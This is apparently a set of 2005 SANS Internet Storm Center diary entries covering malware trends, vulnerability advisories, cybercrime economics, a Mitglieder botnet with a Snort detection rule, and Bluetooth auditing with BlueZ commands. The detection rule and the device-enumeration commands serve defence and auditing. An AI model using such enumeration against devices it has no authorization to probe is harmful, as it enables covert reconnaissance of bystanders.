The fourth one is quite obvious and sometimes even I am not sure if I would put in the same category (pw stealers). But I am putting because these ones are specific for pwstealers. These downloaders usually will contact a free hosting site and download a piece of one of the three kinds above...!

Another thing that I am also observing is that they are changing the way the code is packed...recently they are changing the king of packer used, to some more powerful ones...more difficult to reverse...

Well...that's it!

Ah, if you are following my malware analysis quiz, I posted the results of the first one last friday and already put the new one, which the answers should be sent no longer than Oct 15. :) I hope that you are having as much fun as I am!:) I am already getting some really great answers!

signing off...
Handler on Duty: Pedro Bueno - pbueno $$ ( isc. sans. org )


Published: 2005-10-05

CME was officially lauched

Some days ago, our handler Donald Smith wrote about how "US-CERT, the U.S. Computer Emergency Readiness Team, will begin issuing uniform names for computer viruses, worms and other malicious code next month, as part of a program called the Common Malware Enumeration initiative."

Today the US-CERT and Mitre released the CME, the Common Malware Enumeration, in a document called "Common Malware Enumeration Initiative Now Available" . As it is supported by a board of Anti-Virus vendors, I believe that this initiative is really great and hope that it could be adopted by all the vendors as well, so we could also have more accurante numbers about virus variants.

This initiative seeks (according the document):
  • Reduce the public's confusion in referencing threats during malware incidents
  • Enhance communication between anti-virus vendors
  • Improve communication and information sharing between anti-virus vendors and the rest of the information security community
Handler on Duty: Pedro Bueno - pbueno $ ( isc . sans. org)


Published: 2005-10-05

Big Business surrounding Internet Fraud

In yesterdays diary, William Salusky posted information about his battle (and beef) with a very well organized Mitglieder proxynet.  One of our avid readers posted the question of "How big is the Internet Fraud Business, and how organized is it?"

I highly recommend reading Spam Kings ( http://www.oreilly.com/catalog/spamkings/ ) on the specific topic of how the Spam business works.  On the other hand, we have marginal businesses and organized crime participating in the electronic boom as well.

DDoS for Hire:  These are the hired guns of the internet.  They will offer to knock competitors off the internet for a sum of money.  The most famous of these cases revolves around Jay Echouafni, who was the CEO of TV retailer Orbit Communications.  He paid a group of underground computer criminals to DoS his competitors offline.  The series of outages cost an estimated $2 million dollars in damages.  There is a great read on this at Security Focus ( http://www.securityfocus.com/news/9411 )

DDoS for Ransom: This is the online version of an extortion racket.  Ive seen this up close and personal when clients receive an email requesting that payment be made or they will be knocked off the internet.  One of the most famous cases here was of an online casino based out of Costa Rica.  When they were first contacted, the sum of money being requested seemed reasonable to the site owner.  He paid it.  Never, ever, ever, ever, ever... give in to these people.  First he paid approximately $500 for protection.  The following week, the request was a tad higher... $40K.  The site owner requested help from the Costa Rican Police, from the FBI and other law enforcement agencies.  He did not recieve the help (perhaps the feds did not like the idea of offshore gaming).  He finally enlisted the help of a security consultant who analyzed the data, traced the attacks back to an RCM (Russian Cyber Mafia, for those in the know).

Phishing Phraud:  No dont worry, Im not going to go on a long tyrade of words with PH's.  We are all familiar with this field of online crime.  Jacomo Piccollini, from the Brazilian Research Network, gave a fantastic talk at a conference I recently attended.  His topic was about the brazilian underground.  One of the points he made was that Brazilian web defacement groups (of which Brazil happens to be world champion) were being hired by phishing groups to provide hosting of the phishing support sites on the defaced web servers.  Some of these programmers that were working for the BCM (yes, Brazilian Cyber Mafia) were making $3K a month.  The sad point here is that 4 of these programmers ended up dead last year, execution style. 

The internet has reinvented business as we know it, both for good and evil.  I would like to extend a big thank you to all the Internet Storm Center readers that submit information to us, and continue to battle evil one bit at a time.

Mike Poor    mike   at    intelguardians   d0t  com
Handler on Duty


Published: 2005-10-05

Symantec Antivirus Scan Engine: Web Service Administrative Interface Buffer Overflow

iDEFENSE Labs has notified Symantec about a remotely exploitable buffer overflow vulnerability in the Symantec AntiVirus Scan Engine that can allow remote attackers to execute arbitrary code. The iDEFENSE Advisory says "A remote attacker can send a specially crafted HTTP request to the administrative Scan Engine Web Wervice on port 8004 to crash the service or execute arbitrary code."

Patch today folks.

Symantec's Advisory, (with patch and mitigation information) states the "Risk Impact" is High. Affected versions listed are;

Product Version Build Solution

Symantec AntiVirus Scan Engine 4.0 All SAVSE 4.3.12
Symantec AntiVirus Scan Engine 4.3 All SAVSE 4.3.12
Symantec AntiVirus Scan Engine for ISA 4.0 All SAVSE 4.3.12
Symantec AntiVirus Scan Engine for ISA 4.3 All SAVSE 4.3.12
Symantec AntiVirus Scan Engine for Netapp Filer 4.0 All SAVSE 4.3.12
Symantec AntiVirus Scan Engine for Messaging 4.3 All SAVSE 4.3.12
Symantec AntiVirus Scan Engine for Netapp NetCache 4.0 All SAVSE 4.3.12
Symantec AntiVirus Scan Engine for Network Attached Storage 4.3 All SAVSE 4.3.12
Symantec AntiVirus Scan Engine for Bluecoat 4.0 All SAVSE 4.3.12
Symantec AntiVirus Scan Engine for Caching 4.3 All SAVSE 4.3.12
Symantec AntiVirus Scan Engine for Microsoft SharePoint 4.3 All SAVSE 4.3.12
Symantec AntiVirus Scan Engine for Clearswift 4.0 All SAVSE 4.3.12
Symantec AntiVirus Scan Engine for Clearswift 4.3 All SAVSE 4.3.12

Non-Affected Product(s)

Product Version Build
Symantec AntiVirus Scan Engine 4.1 All


Published: 2005-10-03

Mitglieder hell

I have been very recently (and still am) investigating the business end of a very active Mitglieder proxynet.  In my experience, these proxy botnets are traditionally used to relay spam, but I have over time witnessed other uses of proxy botnets including and not limited to advertising click-thru fraud, fraudulent email and IM registration/creation, http based web attacks, and all manner of authentication brute force attacks.

I am currently a witness to the receiving end of a large scale brute force attack leveraged by a decently sized proxy botnet consisting of anywhere from 8k-12k nodes attacking at any time on any given day.  I'm somewhat frustrated by the ongoing success of these botnet variants due to this particular variant's HTTP based phone home method to register the client IP and socks proxy listner port.  Why oh Why does it have to be so hard to kill these international web servers dead.  The specific Mitglieder variant I have been looking at lately has at least 42 unique HTTP phone home destinations that are still DNS resolvable.  The bots phone home with the following HTTP GET patterns which result in the target HTTP server logging the client IP address including the socks proxy port number as a query string argument.  Even though many of these servers are obviously virtual hosting environments that return 404 errors or other status codes, it is still possible that they are involved in this mess since the HTTP server will still continue to gladly log the pertinent client IP and port number of infected nodes via error logging.

In the following list, the tpoint.ru host is currently THE WORST of them and possibly the primary node in masterminding the aggregation and distribution of the active botnet list to other top level proxy abusers to be used for bulk mailer and other abuse types that benefit from an additional hop of anonymous connectivity.  This is absolutely organized big business.  Within minutes of sending a fake connection to tpoint.ru you would see inbound socks proxy abuse.  Try it, you'll see.  Whether you like it is another matter altogether.

Here's a snort signature that can help identify not only Mitglieder proxy infections on your networks, but just about any other proxy bot variant when they are abused for bulkmailing purposes.  Apologies for the snort signature line wrap.  Yes, the rule should be one single line.

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg: "BLEEDING-EDGE Spambot Proxy Control Channel"; flow: established; content:"|04010019|"; offset: 0; depth: 4; classtype: trojan-activity; sid: 2001814; rev:4; )

After you've completed your own personal investigations, I myself recommend blocking access to the following host names from your networks.


Give 'em hell.

William Salusky
Handler on Duty (heh heh)
Future homepage for the above handler.


Published: 2005-10-03

Arnold muscles in to put the smackdown on phishers.

California Governor Arnold Schwarzenegger flexed his muscles in signing California bill 355 into law on Friday September 30th making phishing offenses punishable by law to the tune of either actual damages, or $500,000(USD).  I'll take the latter thank you very much.  Now the problem is actually left in find a phisher that stands still for their punishment.  California Bill 355 is viewable here.

I hope it's not long before Virginia has an equivalent law on the books.  If not, I'll petition for it and ask that the default maximum amount be set to 1mil(USD).  Hey, Why not?


Published: 2005-10-03

UDP/1030 (continued)

In a continuing effort since yesterday, our readers have been providing us with packet captures of UDP/1030 traffic and does in fact confirm the Dshield port utilization increase is attributed to Windows messenger popup spamming attempts.  We are no longer in need of new packet captures.  I repeat, we are no longer in need of packet captures.  We however, have been unable to confirm any case in which this traffic would result in a successful display of messenger popup spam.

All samples provided were of the 'Registry fix, You need our application' spam, and if you regularly look at traffic capture this is will be nothing new.  I am almost to the point where I treat UDP/1025-1030 as universal background noise.


Published: 2005-10-03

Kaspersky Anti-Virus Products Remote Heap Overflow Vulnerability

From the advisory the "issue is due to a heap overflow error in the CAB file format parser that does not properly handle a specially crafted file containing large header records and particular header flags set, which could be exploited by attackers to execute arbitrary commands (e.g. by sending an email containing a specially crafted CAB file)."


Published: 2005-10-02

Volunteer Response

Thanks to all who have volunteered over the past few weeks to assist the Red Cross and others with technical support in the wake of hurricanes Katrina and Rita.  Over 300 people and dozens of companies signed up, and the Red Cross has told us that the outpouring of help was really appreciated.  Here are some of the comments we received from Gordon Bass, the Deputy Chief Information Security Officer of the American Red Cross:

"Tim ... is spending 1 to 2 weeks of his personal vacation time on assignment in our disaster operations warehouse in Austin, TX, performing configuration management and deployment of computer assets to shelters."

"Robert ... is spending one or more days of his personal time helping us to configure our new TippingPoint IPSs at national HQ."

"Chris ..., and project manager, Russ ..., configured and delivered 16 IBM donated Thinkpads to four chapter/disaster operations locations in Mobile, Pascagoula, Gulfport, and Hattiesburg on Friday and Saturday, Sept. 9-10.  Those laptops are being used in shelter and client assistance operations."

"A week ago I mentioned two volunteers that were helping us out.  Since then, we have engaged many more SANS volunteers.  At this point I am not sure if I can even identify them all, since I shared our list of volunteers with so many people that needed technology help in our various Gulf coast service areas.  But we know they're helping.  As well as individuals, there are companies helping us out."

Folks, it goes without saying but Thanks Very Much for all that you are doing to assist in the recovery efforts!  Please keep up the great work and the volunteer spirit!


Published: 2005-10-02

Storm Center in the News

The SANS Internet Storm Center was featured in two news stories this past week.  Kudos to Tom Liston for his assistance to CNN with their story on Internet fraud that appeared on September 29th.  Look about two-thirds of the way down for his comments.  Over on Voice of America, yours truly appeared in a series on Internet crime and what we are doing behind the scenes at the ISC to assist law enforcement.  It's a three part series, here are links to part1, part 2, and part 3.


Published: 2005-10-02

udp/1030 Increase

We've noticed a significant increase in udp/1030 activity in the past 24 hours.  Our initial assessment is that this is a new form of pop-up spam.  If you have captured any of this and have thoughts or analysis you can contribute, please drop us a note on our contact page.  (Update:  earlier I had said "tcp" vice "udp" - I didn't pay close attention to our sensor outputs.  It should be udp.)


Published: 2005-10-01

Bluetooth Auditing

I had promised more details on how I conducted my bluetooth audit during a disaster drill (http://isc.sans.org/diary.php?date=2005-06-20) when I was handler last, I was also working some local response to Katrina (http://isc.sans.org/diary.php?date=2005-09-05) and didn't have the spare mental cycles to provide an update.  Today has allowed me a few moments to play a bit, and fulfill my promises.

The platform
I used what I call my "combat laptop," or the "throwaway laptop."  This is the one that I carry with me when I travel and go to conferences.  It's had a lot of damage, but it still runs linuxes just fine.  This particular incarnation is running Debian and I used the BlueZ bluetooth stack/suite (http://www.bluez.org/)

The Bluetooth interface I used is a Belkin Bluetooth USB Adapter (F8T001).

Getting it up and running wasn't trivial; I found the following links to be helpful resources:
http://www.kevinboone.com/PF_p800_linux.html (specifically with it's references to bluezfw.)

Actually, nothing I tried could get it to work, until I moved the bluetooth dongle to another USB port.  I'm not sure why that was required, but I'm not always the smartest little Mouseketeer.

While experiementing with other platforms, I found that knoppix includes bluetooth USB support.

The software
While googling on the topic, you will find lots of references to customized software used for the scanning (and by references you see people mention it, but nobody coughs up a link.)  Since my initial goal was simple enumeration of devices and quick assessment of how "juicy" a given target area is, I did not have need for actual bluetooth exploits.  I found that the basic tools in the BlueZ tool suite were sufficient for my needs.

Starting simply with:
    hcitool scan

This will list the hardware ID numbers and a manufacturer's name of any device advertising in range.  That "advertising" part is important.  These would be the wardriving equivalent of wide open WAPs broadcasting.

If you are looking for particular services to exploit -- er enumerate, you can simply scan for devices that support the feature of interest.  For example, to find devices capable of setting up a dial-up internet connections, you would use:
    sdptool search DUN

Other interesting services to search for are FTRN (for file transfer,) and OPUSH.

A much more scientific way to go about this process is to use bp from the trifinite group (http://trifinite.org/) which I like because it relies on BlueZ's sdptool, and the Bluetooth Device Security Database (http://www.betaversion.net/btdsd/) all glued together with perl.  Nice and simple and hackable.

Their process interrogates a bluetooth device using sdptool browse --tree XX:XX:XX:XX:XX:XX (which might be handy to have around later anyway.)

Antenna Performance
Although the box advertised 100m ranges, a dongle plugged into the side of a laptop isn't in an ideal location for signal reception.  Use of a USB extension cable is recommended.  If you want to get really crazy, place the dongle in the focus point of a parabolic dish (I haven't tried that myself, but I've heard it works for 802.11 dongles.)  You could also hack an external antenna onto your bluetooth interface (http://trifinite.org/trifinite_stuff_bluetooone.html) I haven't tried this either.  The orderlies don't like me around soldering irons and glue-guns.

Sensor Placement
Unlike wardriving, this is more of a sit-and-wait game.  Bluetooth devices and users are mobile, so it's better to pick a proper high-traffic area (or better yet: the meeting room where you're holding your audit kick-off meeting.)  With enough sensors and proper placement, you can track the movement of your bluetooth users within your facility or campus.  I'm sure nobody would do anything bad with that information. :-\

In other related neat-stuff-to-do
Check out http://cellspotting.com for something only peripherally related.

It is my first shift with the new system (be gentle,) any errors in typography, grammar, or HTML syntax are purely my own.
kliston -at- isc sans org